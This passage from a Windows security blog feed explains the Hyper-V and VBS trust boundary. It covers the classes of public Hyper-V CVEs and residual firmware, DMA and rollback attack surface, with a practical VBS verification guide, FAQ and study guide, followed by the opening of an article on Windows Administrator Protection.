&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every public Hyper-V CVE since 2018 lives in one of three narrow code paths -- device emulation, hypercall input validation, or VTL0-to-VTL1 secure-call dispatch. The TLFS-visible primitives (intercepts, SynIC, per-VTL SLAT) have produced none.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The Pwn2Own dimension&lt;/h3&gt;
&lt;p&gt;Through Pwn2Own Berlin 2025, no public live Hyper-V guest-to-host escape has been demonstrated at Pwn2Own. The cross-vendor analogue -- and the industry&apos;s best calibration of how hard a hypervisor escape is to find when a researcher has a public dollar incentive and a deadline -- is the first-ever ESXi escape in Pwn2Own history, executed by Nguyen Hoang Thach of STAR Labs SG on Day Two (May 16, 2025) using a single integer overflow vulnerability (the affected subsystem and full mechanism were withheld pending the vendor patch). The award was $150,000 plus 15 Master of Pwn points; STAR Labs went on to win overall Master of Pwn for the competition with $320,000 across three days [@zdi-pwn2own-day3].&lt;/p&gt;
&lt;p&gt;The full mechanism was not disclosed within the coordinated-disclosure window, but the exploit class is structurally the same as the vmswitch family: structured, attacker-shaped input parsed by a host-side component that then corrupts host memory, just landed in a different vendor&apos;s device-emulation path.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Class&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;CVSS&lt;/th&gt;
&lt;th&gt;Location&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;CVE-2021-28476&lt;/td&gt;
&lt;td&gt;A: device emulation&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;9.9&lt;/td&gt;
&lt;td&gt;&lt;code&gt;vmswitch.sys&lt;/code&gt; (root partition)&lt;/td&gt;
&lt;td&gt;[@nvd-cve-2021-28476]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2025-21333&lt;/td&gt;
&lt;td&gt;A: device emulation&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;7.8&lt;/td&gt;
&lt;td&gt;NT Kernel Integration VSP (root partition)&lt;/td&gt;
&lt;td&gt;[@nvd-cve-2025-21333]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2024-21407&lt;/td&gt;
&lt;td&gt;B: hypercall path&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;8.1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;hvix64.exe&lt;/code&gt; / &lt;code&gt;hvax64.exe&lt;/code&gt; (hypervisor binary)&lt;/td&gt;
&lt;td&gt;[@nvd-cve-2024-21407]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2024-30092&lt;/td&gt;
&lt;td&gt;B: hypercall path&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;7.5&lt;/td&gt;
&lt;td&gt;Hyper-V hypercall validation&lt;/td&gt;
&lt;td&gt;[@nvd-cve-2024-30092]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2024-49117&lt;/td&gt;
&lt;td&gt;B: hypercall path&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;Hyper-V hypercall validation&lt;/td&gt;
&lt;td&gt;[@nvd-cve-2024-49117]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2020-0917/0918&lt;/td&gt;
&lt;td&gt;C: VTL0-to-VTL1&lt;/td&gt;
&lt;td&gt;2020&lt;/td&gt;
&lt;td&gt;6.8 (per MSRC)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;securekernel.exe&lt;/code&gt; (VTL1, reached via secure call)&lt;/td&gt;
&lt;td&gt;[@amar-king-bh-2020]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    subgraph CA[&quot;Class A: device emulation (root partition)&quot;]
        Vmswitch[&quot;vmswitch.sys -- CVE-2021-28476&quot;]
        Vsp[&quot;NT Kernel Integration VSP -- CVE-2025-21333&quot;]
    end
    subgraph CB[&quot;Class B: hypercall input validation (hypervisor binary)&quot;]
        UAF[&quot;CVE-2024-21407 (UAF)&quot;]
        Input[&quot;CVE-2024-30092&quot;]
        Hpcall[&quot;CVE-2024-49117&quot;]
    end
    subgraph CC[&quot;Class C: VTL0-to-VTL1 (secure call dispatch)&quot;]
        Oob[&quot;CVE-2020-0917 (OOB write)&quot;]
        Mdl[&quot;CVE-2020-0918 (SkmmUnmapMdl)&quot;]
    end
    Guest[&quot;Guest VM&quot;] --&amp;gt; CA
    Guest --&amp;gt; CB
    Vtl0[&quot;Privileged VTL0 (kernel)&quot;] --&amp;gt; CC
&lt;p&gt;This is the third insight the article is built around. The reader&apos;s prior model may have been &quot;hypervisors fail in mysterious, deep ways; the boundary is fragile in unknown places.&quot; The new model is &quot;every public Hyper-V escape since 2018 lives in one of three narrow code paths, and the TLFS-visible primitives have produced none.&quot; The narrowness of the failure space is itself a security argument. The hypervisor&apos;s micro-kernelized design has held; what has not always held are the components Microsoft chose to put &lt;em&gt;next to&lt;/em&gt; the hypervisor, in the root partition&apos;s user mode and kernel mode, by deliberate architectural choice in 2008.&lt;/p&gt;
&lt;p&gt;Six worked examples; three classes; one boundary; an unflinching public record. The boundary is alive and producing CVEs at roughly two to four per year. But every CVE so far has lived somewhere the hypervisor itself controls. The interesting question is what lives in places it does not control.&lt;/p&gt;
&lt;h2&gt;11. The Residual Attack Surface -- Beneath, Beside, and Around&lt;/h2&gt;
&lt;p&gt;The hypervisor enforces a clean boundary against everything &lt;em&gt;above&lt;/em&gt; it -- the NT kernel, user mode, even other guest VMs. It cannot, by construction, enforce anything against what lives &lt;em&gt;below&lt;/em&gt; or &lt;em&gt;beside&lt;/em&gt; it. Three structural classes of residual attack matter. We walk each.&lt;/p&gt;
&lt;h3&gt;11.1 Firmware below the hypervisor&lt;/h3&gt;
&lt;p&gt;System Management Mode (SMM), the UEFI runtime, the platform Manageability Engine (Intel ME), and the AMD Platform Security Processor (PSP) all run at higher privilege than the hypervisor for parts of boot and runtime. SMM in particular is a CPU mode that is invoked through System Management Interrupts (SMI) and has unrestricted access to all of physical memory, including the hypervisor&apos;s own pages. If the OEM-supplied SMM handler contains an exploitable bug, an SMI can run attacker code in a privilege mode strictly above the hypervisor&apos;s.&lt;/p&gt;
&lt;p&gt;The threat is not hypothetical. The Binarly research team&apos;s 2023 LogoFAIL disclosures showed entire classes of image-parser bugs in UEFI firmware reachable from a privileged OS context; BootHole (CVE-2020-10713, a buffer overflow in GRUB2&apos;s &lt;code&gt;grub.cfg&lt;/code&gt; parser) and BlackLotus (CVE-2022-21894, a UEFI Secure Boot bypass) showed that pre-boot bugs in widely-deployed bootloaders could ride past Secure Boot. None of these is a hypervisor bug; all of them are residual attack surface from the hypervisor&apos;s point of view.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s mitigation is the &lt;em&gt;dynamic&lt;/em&gt; root of trust for measurement -- System Guard Secure Launch -- which we touched on in section 8. After UEFI Secure Boot has done its static-RTM job, Intel TXT&apos;s &lt;code&gt;SENTER&lt;/code&gt; (or AMD&apos;s &lt;code&gt;SKINIT&lt;/code&gt;) executes a CPU-hardware-rooted late launch: the CPU resets to a known state, runs an Intel- or AMD-signed Authenticated Code Module (ACM), and measures the hypervisor binary into TPM PCRs 17-22 before transferring control to it. The result is that even if pre-boot firmware is compromised, the post-DRTM PCR values reflect the actual hypervisor binary; a compromised UEFI cannot silently substitute a different hypervisor without changing the attestation [@ms-system-guard-secure-launch, @ms-hardware-root-of-trust]. The residual after DRTM: OEMs that don&apos;t ship Secure Launch on their motherboards, or that ship buggy SMM handlers that can be invoked after launch.&lt;/p&gt;
&lt;h3&gt;11.2 Hardware side channels&lt;/h3&gt;
&lt;p&gt;Microarchitectural side-channel attacks cross the VTL boundary at the level of CPU implementation, not at the level of architectural specification. The 2018 Spectre and Meltdown disclosures -- followed by the L1TF, MDS, Retbleed, and CacheWarp families in the years since -- showed that speculatively-executed code on a CPU can leak microarchitectural state across privilege boundaries that the architectural ISA promises to protect.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s mitigation cadence has been in-tree and aggressive: Kernel Virtual Address Shadow (the Windows equivalent of KPTI) for Meltdown; IBRS, STIBP, and retpolines for Spectre v2; HyperClear for L1TF on Hyper-V hosts. Each Patch Tuesday since 2018 has shipped at least one microarchitectural mitigation; cumulatively the cost has been measurable but bounded.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The microarchitectural ceiling is hardware, not software. Intel TDX and AMD SEV-SNP -- the two confidential-computing architectures that move the trust root from the hypervisor to per-VM hardware encryption -- both explicitly &lt;em&gt;disclaim&lt;/em&gt; resistance to this class. If the CPU leaks across a Spectre-class side channel, no software-level isolation primitive (VTL, partition, SEAM, SEV-SNP) can fully recover the property. The mitigation is hardware that doesn&apos;t leak, and that mitigation arrives one CPU generation at a time.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;11.3 IOMMU and DMA bypass&lt;/h3&gt;
&lt;p&gt;The IOMMU -- Intel VT-d, AMD-Vi -- is the hardware that gates DMA from peripheral devices to physical memory. If the IOMMU is configured correctly, a Thunderbolt-attached device cannot read or write arbitrary memory; it can only DMA to regions the OS has explicitly mapped for it. If the IOMMU is disabled, configured permissively, or has firmware bugs of its own, DMA becomes an end-run around every architectural protection above it -- including the hypervisor&apos;s.&lt;/p&gt;
&lt;p&gt;The threat is again not hypothetical. Bjorn Ruytenberg&apos;s Thunderspy disclosure in 2020 documented seven DMA-class vulnerabilities in Thunderbolt 3 firmware, demonstrating that an attacker with physical access could read or modify arbitrary memory on a powered-on system through a malicious peripheral [@thunderspy]. The Microsoft mitigation is Kernel DMA Protection (Windows 10 1803 and later): the hypervisor configures the IOMMU at boot to deny DMA from externally-attached devices outside of explicitly authorized regions, and DMA from any peripheral whose driver has not been loaded under a trusted policy is refused at the IOMMU [@ms-kernel-dma-protection]. The structural residual: pre-boot DMA, before Windows has finished configuring the IOMMU; client motherboards that still ship with VT-d or AMD-Vi disabled in BIOS; OEMs that disable Kernel DMA Protection by default.&lt;/p&gt;
&lt;h3&gt;11.4 Hypervisor downgrade and rollback&lt;/h3&gt;
&lt;p&gt;Alon Leviev&apos;s &quot;Windows Downdate&quot; at Black Hat USA 2024 disclosed a class of attack that the prior three sections do not cover: rollback of the hypervisor binary itself to a previously-vulnerable, but still validly-signed, build [@nvd-cve-2024-21302].&lt;/p&gt;
&lt;p&gt;The structural argument: UEFI Secure Boot prevents loading an &lt;em&gt;unsigned&lt;/em&gt; &lt;code&gt;hvix64.exe&lt;/code&gt;. It does &lt;em&gt;not&lt;/em&gt; prevent loading an older &lt;code&gt;hvix64.exe&lt;/code&gt; that remains validly signed and merely unrevoked. If Microsoft fixes a Secure Kernel bug in build N+1 and a VTL0 attacker can convince the system to load build N at the next reboot, the patched bug is alive again. CVE-2024-21302 demonstrated exactly this rollback against both the hypervisor and the Secure Kernel through manipulation of the Windows Update servicing pipeline. The mitigation is mandatory-update servicing combined with proactive revocation list (&lt;code&gt;dbx&lt;/code&gt;) hygiene -- once an older binary&apos;s hash is in the UEFI revocation list, Secure Boot will refuse to load it -- and Microsoft completed mitigations across Windows 10 1507 through Windows Server 2019 in the July 8, 2025 update wave [@nvd-cve-2024-21302].&lt;/p&gt;

flowchart TD
    HW[&quot;Hardware (CPU, RAM, IOMMU, TPM)&quot;]
    SM[&quot;System Management Mode (Ring -2) -- residual: SMM handler bugs&quot;]
    FW[&quot;UEFI firmware -- residual: LogoFAIL, BootHole, BlackLotus&quot;]
    DR[&quot;DRTM ACM (Intel TXT / AMD SKINIT)&quot;]
    HV[&quot;Microsoft Hypervisor (hvix64 / hvax64)&quot;]
    Iommu[&quot;IOMMU (VT-d / AMD-Vi) -- residual: Thunderspy, pre-boot DMA&quot;]
    Vtl1[&quot;VTL1 (Secure Kernel + trustlets)&quot;]
    Vtl0[&quot;VTL0 (NT kernel + user mode)&quot;]
    Side[&quot;Microarchitectural side channels -- Spectre / Meltdown / MDS / Retbleed&quot;]
    Update[&quot;Windows Update servicing -- residual: hypervisor rollback (CVE-2024-21302)&quot;]
    HW --&amp;gt; SM
    SM --&amp;gt; FW
    FW --&amp;gt; DR
    DR --&amp;gt; HV
    HV --&amp;gt; Iommu
    HV --&amp;gt; Vtl1
    HV --&amp;gt; Vtl0
    Side -.-&amp;gt;|&quot;cross all boundaries&quot;| HV
    Update -.-&amp;gt;|&quot;can roll hypervisor back&quot;| HV

The hypervisor is necessary but not sufficient. The firmware-Secure-Boot-DRTM substrate beneath it, the microarchitectural ceiling above it, the IOMMU configuration beside it, and the Windows Update pipeline that decides which hypervisor build runs next are co-equal members of the same boundary. None of them is the hypervisor; all of them have to do their job for the hypervisor&apos;s guarantees to hold. The substrate is real, but the boundary is the combination of the substrate and what holds it up.
&lt;p&gt;Necessary, not sufficient. That phrase is the article&apos;s honest answer to the question &quot;how good is the substrate?&quot; The answer is that the substrate is genuine, the boundary is published, the bounty calibration is the highest in the industry, the public CVE record is alive and narrow, and the residual attack surface lives in places the hypervisor cannot by construction control. The substrate is what we have explored in detail; what holds it up is what we have just sketched. The last section turns from theory to practice.&lt;/p&gt;
&lt;h2&gt;12. Practical Guide, FAQ, and Closing&lt;/h2&gt;
&lt;p&gt;If you have read this far, the natural next question is &quot;is this on, on my machine, and how do I check?&quot; The practical answer is short.&lt;/p&gt;
&lt;h3&gt;12.1 Enabling and verifying VBS&lt;/h3&gt;
&lt;p&gt;VBS is configurable through several paths: Group Policy (&lt;code&gt;Computer Configuration &amp;gt; Administrative Templates &amp;gt; System &amp;gt; Device Guard&lt;/code&gt;), Intune, MDM CSPs (&lt;code&gt;DeviceGuard/EnableVirtualizationBasedSecurity&lt;/code&gt;, &lt;code&gt;DeviceGuard/ConfigureSystemGuardLaunch&lt;/code&gt;), the Windows Security UI, or directly via &lt;code&gt;bcdedit /set hypervisorlaunchtype Auto&lt;/code&gt;. Verification is best done with three small commands.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;msinfo32&lt;/code&gt; -&amp;gt; the Device Guard / Virtualization-based Security row. &quot;Services Configured&quot; lists what policy has requested; &quot;Services Running&quot; lists what is actually active. Kernel DMA Protection and Secure Launch each appear as their own row.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Get-CimInstance -ClassName Win32_DeviceGuard&lt;/code&gt; -&amp;gt; &lt;code&gt;VirtualizationBasedSecurityStatus&lt;/code&gt; (0 = off, 1 = enabled but not running, 2 = running); &lt;code&gt;SecurityServicesRunning&lt;/code&gt; array (HVCI, Credential Guard, etc.); &lt;code&gt;RequiredSecurityProperties&lt;/code&gt; (the policy floor).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bcdedit /enum&lt;/code&gt; -&amp;gt; &lt;code&gt;hypervisorlaunchtype Auto&lt;/code&gt; is the default; &lt;code&gt;loadoptions DISABLE_VBS_*&lt;/code&gt; is how an administrator can opt out (you should not see these flags on a properly-configured machine).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;{`
// Given a parsed Win32_DeviceGuard object, compute whether VBS is healthy.
// The actual Win32_DeviceGuard schema is on Microsoft Learn; this is the
// decision logic an operator would write against it.
function checkVbsHealth(dg) {
  const result = { ok: false, reasons: [] };&lt;/p&gt;
&lt;p&gt;  // VBS itself
  if (dg.VirtualizationBasedSecurityStatus !== 2) {
    result.reasons.push(&apos;VBS is not running (status != 2)&apos;);
  }&lt;/p&gt;
&lt;p&gt;  // HVCI (Memory Integrity)
  if (!dg.SecurityServicesRunning.includes(2)) {
    result.reasons.push(&apos;HVCI / Memory Integrity is not running&apos;);
  }&lt;/p&gt;
&lt;p&gt;  // Credential Guard
  if (!dg.SecurityServicesRunning.includes(1)) {
    result.reasons.push(&apos;Credential Guard is not running&apos;);
  }&lt;/p&gt;
&lt;p&gt;  // Required floor properties (e.g. Secure Boot, DMA protection, SMM mitigation)
  const requiredFloor = [1, 2, 3]; // service codes per Win32_DeviceGuard
  for (const r of requiredFloor) {
    if (!dg.AvailableSecurityProperties.includes(r)) {
      result.reasons.push(&apos;Missing required security property: &apos; + r);
    }
  }&lt;/p&gt;
&lt;p&gt;  result.ok = result.reasons.length === 0;
  return result;
}&lt;/p&gt;
&lt;p&gt;const example = {
  VirtualizationBasedSecurityStatus: 2,
  SecurityServicesRunning: [1, 2, 3],
  AvailableSecurityProperties: [1, 2, 3, 4, 5],
};
console.log(JSON.stringify(checkVbsHealth(example), null, 2));
// -&amp;gt; { ok: true, reasons: [] }
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Three commands, in order: &lt;code&gt;msinfo32&lt;/code&gt; for the human-readable summary; &lt;code&gt;Get-CimInstance -ClassName Win32_DeviceGuard | Format-List *&lt;/code&gt; for the structured detail; &lt;code&gt;bcdedit /enum {current}&lt;/code&gt; to confirm &lt;code&gt;hypervisorlaunchtype Auto&lt;/code&gt; and the absence of &lt;code&gt;DISABLE-VBS&lt;/code&gt; / &lt;code&gt;DISABLE-LSA-ISO&lt;/code&gt; load options. If all three agree that VBS, HVCI, and Credential Guard are running, you are in the configuration this article describes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;12.2 Operational pitfalls&lt;/h3&gt;
&lt;p&gt;Two operational realities are worth flagging. First, HVCI has a &lt;em&gt;&lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;driver block list&lt;/a&gt;&lt;/em&gt; and will refuse to enable Memory Integrity if any incompatible driver is installed; the usual offenders are older anti-cheat drivers, third-party virtualization clients (VMware Workstation pre-2021, VirtualBox pre-6.1), and certain disk-encryption or storage-filter drivers. Microsoft maintains a public block list; the Memory Integrity UI in Windows Security will report the specific blocking driver. Second, nested virtualization is supported for Hyper-V guests on Windows 10/11 client and Server 2016+, and is required by some development workflows (WSL2 with nested containers, certain Visual Studio device emulators). Nested virtualization changes the threat model -- the L0 hypervisor still owns the box, but the L1 guest now runs its own hypervisor with its own VTL split -- so a compromised L1 guest with VBS enabled still does not give an L1 attacker a path to the L0 host.&lt;/p&gt;
&lt;h3&gt;12.3 The substrate cross-reference&lt;/h3&gt;
&lt;p&gt;This article is the substrate of the Windows security series at paragmali.com. The siblings build on what is here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot in Windows&lt;/a&gt; -- the static-RTM half of the boot trust chain that hands off to the hypervisor.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;VBS Trustlets: What Actually Runs in the Secure Kernel&lt;/a&gt; -- the VTL1 internals that the hypervisor&apos;s secure-call ABI delivers requests to.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLMless: The Death of NTLM in Windows&lt;/a&gt; -- the Credential Guard story from inside LSAISO.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless: Administrator Protection in Windows&lt;/a&gt; -- the user-mode admin trust model that the kernel-mode VBS boundary makes possible.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;Can This Code Do This? Windows Access Control&lt;/a&gt; -- the access-control surface that VBS supplements but does not replace.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;12.4 Frequently asked questions&lt;/h3&gt;


The 10-30 percent number is folklore from the pre-SLAT era or from systems running HVCI-incompatible drivers in compatibility mode. For typical workloads on modern hardware (post-2018 CPUs with VT-x or AMD-V and SLAT), the measured overhead of VBS plus HVCI plus Credential Guard sits in the low single digits. Gaming and high-throughput I/O workloads can show larger gaps, especially on systems where the BIOS forces nested virtualization off or where IOMMU is disabled. The trade-off for that overhead is the security-boundary set described in this article.

No. VBS is a Virtual Trust Level split *inside* the root partition. There are no extra VMs. The normal Windows install is VTL0; the Secure Kernel plus its trustlets is VTL1. Both VTLs live in the same partition, share the same physical CPU, and are scheduled by the hypervisor as separate VTL contexts -- not as separate VMs. A Hyper-V guest VM, by contrast, is a child partition entirely separate from the root partition. The two architectures share a hypervisor binary but use different parts of it.

No. SYSTEM is a high VTL0 user-mode token; the hypervisor sits architecturally above all of Ring 0, which is where SYSTEM-loaded kernel drivers ultimately run. The point of the entire article is that &quot;SYSTEM owns the box&quot; is wrong on a VBS-enabled Windows install. SYSTEM is the most privileged Windows identity; the hypervisor is the most privileged *software*, and the two are not the same thing.

No. Secure Boot prevents loading an *unsigned* `hvix64.exe`. It does not prevent loading an older, signed-but-vulnerable `hvix64.exe` that has not been added to the UEFI revocation list. That gap is what CVE-2024-21302 (Windows Downdate) exploited, and the mitigation is mandatory-update servicing combined with prompt revocation-list (`dbx`) hygiene [@nvd-cve-2024-21302].

No. seL4 is formally verified at approximately ten thousand lines of code with a roughly twenty-five-person-year proof effort. The Microsoft hypervisor is unverified at an estimated one to two hundred thousand lines of code. The hypervisor&apos;s security argument is operational -- a small TCB, heavy continuous fuzzing, a standing \$5K-\$250K bounty, public servicing criteria, an unflinching public CVE record -- rather than mathematical [@sel4-whitepaper, @ms-msrc-bounty-hyperv].

Yes, in terms of binary identity, servicing criteria, and bounty eligibility. The Microsoft hypervisor that boots on a Windows 11 client laptop and the one that boots on an Azure host server are derived from the same codebase, ship with the same servicing commitments, and qualify for the same Hyper-V bounty. The threat model differs -- Azure adds multi-tenant guest-to-guest isolation, hardware confidential-VM extensions, and a different management surface -- but the substrate is shared.

&lt;h3&gt;12.5 Closing&lt;/h3&gt;
&lt;p&gt;The reason SYSTEM on a Windows 11 box cannot read LSASS, load an unsigned driver, or patch &lt;code&gt;ntoskrnl.exe&lt;/code&gt; is now fully accounted for. An &lt;code&gt;hvix64.exe&lt;/code&gt; or &lt;code&gt;hvax64.exe&lt;/code&gt; loaded by &lt;code&gt;hvloader.efi&lt;/code&gt; before &lt;code&gt;winload.exe&lt;/code&gt; ever ran. A VTL split inside the root partition, made possible by Hepkin and Kishan&apos;s 2013 patent and shipped with Windows 10 RTM in 2015. Per-VTL SLAT enforcement that the NT kernel architecturally cannot touch, because the SLAT tables live in pages the hypervisor never maps into a VTL0 view. A Microsoft-published security boundary and a $5,000-$250,000 bounty calibrating the boundary&apos;s value, whose $250,000 standing ceiling is, at this writing, the highest among the compared public bounty programs. A public CVE record of six worked examples across three narrow classes that the boundary has had to pay out on since 2018. And a residual attack surface -- firmware below, side channels above, IOMMU bypass beside, hypervisor rollback through the update pipeline -- that the substrate cannot, by construction, eliminate.&lt;/p&gt;
&lt;p&gt;The hypervisor is what every other article in this series sits on. Now you have the substrate in hand. The Secure Kernel article reads differently when you have walked the per-VTL SLAT yourself. The Credential Guard article reads differently when you know that LSAISO is invoked through a hypercall-mediated secure call. The Secure Boot article reads differently when you know that the hypervisor&apos;s DRTM measurement re-establishes the trust root &lt;em&gt;after&lt;/em&gt; firmware. The Adminless article reads differently when you know that the privilege ceiling on Windows 11 is not Ring 0 but a hardware boundary above it.&lt;/p&gt;
&lt;p&gt;Above Ring Zero is not a metaphor. It is an instruction-set state. The Windows hypervisor lives there, owns the page tables that say what the OS can see, and is the architectural reason &quot;SYSTEM-on-Windows-11&quot; cannot do things SYSTEM used to be allowed to do.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-hypervisor-security-primitive&quot; keyTerms={[
  { term: &quot;VBS&quot;, definition: &quot;Virtualization-Based Security. A Windows architecture that uses the Hyper-V hypervisor to isolate security-critical code (the Secure Kernel and trustlets) from the regular NT kernel via per-VTL SLAT.&quot; },
  { term: &quot;VTL&quot;, definition: &quot;Virtual Trust Level. A hypervisor-managed privilege level inside a single partition; each VTL has its own SLAT mapping, register state, and interrupt subsystem. Two VTLs ship today (VTL0 = Normal world, VTL1 = Secure world); the architecture admits up to sixteen.&quot; },
  { term: &quot;Hypercall&quot;, definition: &quot;A guest-to-hypervisor call issued via vmcall (Intel) or vmmcall (AMD). The hypercall ABI is documented in the TLFS; rcx carries the call code and a control word, rdx/r8 carry parameters (fast) or GPA pointers to parameter pages (slow).&quot; },
  { term: &quot;SynIC&quot;, definition: &quot;Synthetic Interrupt Controller. The hypervisor&apos;s per-virtual-processor event-delivery surface. SynIC carries VMBus traffic, secure-call signaling, and synthetic timers.&quot; },
  { term: &quot;SLAT&quot;, definition: &quot;Second-Level Address Translation. Hardware page-table support (Intel EPT, AMD NPT) that lets the hypervisor own a separate mapping from guest-physical to system-physical addresses.&quot; },
  { term: &quot;DRTM&quot;, definition: &quot;Dynamic Root of Trust for Measurement. A late-launch event (Intel TXT SENTER, AMD SKINIT) that measures the hypervisor binary into TPM PCRs after firmware initialization, re-establishing the trust root post-firmware.&quot; },
  { term: &quot;Trustlet&quot;, definition: &quot;A user-mode process that runs inside VTL1&apos;s Isolated User Mode (IUM). Signed with Signature Level 12 plus the IUM EKU. Inbox trustlets include LSAISO (Credential Guard) and VMSP (vTPM host side).&quot; }
]} questions={[
  { q: &quot;Why is the same-privilege paradox an architectural ceiling rather than an implementation bug?&quot;, a: &quot;Because the defender at privilege level P shares an address space with an attacker at the same level. The attacker can locate and edit any state the defender maintains using ordinary load/store instructions. Better defenses at P do not change where the defender lives; only moving the defender to a privilege level above P does.&quot; },
  { q: &quot;What 2013 patent describes the per-VTL design that Windows 10 shipped in 2015?&quot;, a: &quot;US Patent 9,430,642 B2 by David Hepkin and Arun Kishan, priority date September 17, 2013, granted August 30, 2016. It teaches hierarchical Virtual Trust Levels with per-VTL memory access protections and per-VTL virtual-processor register state.&quot; },
  { q: &quot;Name the three classes that all post-2018 public Hyper-V CVEs fall into.&quot;, a: &quot;Class A: device emulation in the root partition (vmswitch.sys, NT Kernel Integration VSP). Class B: hypercall input-validation inside the hypervisor binary itself. Class C: VTL0-to-VTL1 secure-call dispatch into the Secure Kernel.&quot; },
  { q: &quot;Which hypervisor primitive does HVCI&apos;s W^X enforcement ride on?&quot;, a: &quot;Per-VTL SLAT. An NT-kernel attempt to mark a writable VTL0 page executable becomes a memory-access intercept routed to VTL1&apos;s code-integrity service; the hypervisor only grants the new SLAT entry if VTL1 approves.&quot; },
  { q: &quot;Why does Secure Boot not prevent hypervisor rollback?&quot;, a: &quot;Secure Boot validates signatures, not freshness. An older, validly-signed-but-vulnerable hypervisor binary that has not been added to the UEFI revocation list (dbx) will still load. Closing this gap requires proactive dbx hygiene plus mandatory-update servicing, which is what mitigated CVE-2024-21302 Windows Downdate.&quot; },
  { q: &quot;What is the structural difference between Blue Pill (offense) and VBS (defense)?&quot;, a: &quot;Architecturally there is none. Both are thin Type-1 hypervisors that interpose between firmware and OS, own the second-level page tables, and are invisible to the OS unless the OS can attest to what is underneath it. The differences are whose hypervisor it is, whether it was measured at load time, and what it does with its privilege.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>hypervisor</category><category>hyper-v</category><category>vbs</category><category>virtualization</category><category>security</category><category>systems</category><category>tcb</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Adminless: How Windows Finally Made Elevation a Security Boundary</title><link>https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/</link><guid isPermaLink="true">https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/</guid><description>Administrator Protection replaces UAC with a system-managed admin account created per elevation, gated by Windows Hello, and destroyed when the job is done.</description><pubDate>Sun, 10 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Administrator Protection (informally &quot;Adminless&quot;) replaces Windows 11&apos;s split-token UAC with a separate, system-managed local user account.** The operating system creates this **System Managed Administrator Account (SMAA)** per local admin, links it to the primary admin via paired SAM attributes, and uses it to host elevated processes in a fresh logon session gated by Windows Hello. The kernel asks LSA to authenticate &quot;a new instance of the shadow administrator&quot; without any SMAA credential because the SMAA has none. The mechanism makes the elevation path a security boundary for the first time, with bulletin-grade fixes when it fails. Microsoft shipped it in KB5067036 on October 28, 2025, then reverted it on December 1, 2025 over an application-compatibility issue, not a security failure. This article walks the twenty-year argument that produced the design, the nine pre-GA bypasses Forshaw found and Microsoft fixed, and exactly where the new boundary still leaks.
&lt;h2&gt;1. Two tokens, one user, twenty years&lt;/h2&gt;
&lt;p&gt;Open an elevated console on a Windows 11 device with the registry value &lt;code&gt;TypeOfAdminApprovalMode = 2&lt;/code&gt; set, and run &lt;code&gt;whoami /all&lt;/code&gt;. The user name is no longer yours. It is &lt;code&gt;ADMIN_&amp;lt;sixteen random characters&amp;gt;&lt;/code&gt; -- a local account you never created, owned by an operating-system component you never ran, in a logon session that did not exist five seconds ago and will not exist five seconds after the console closes.&lt;/p&gt;
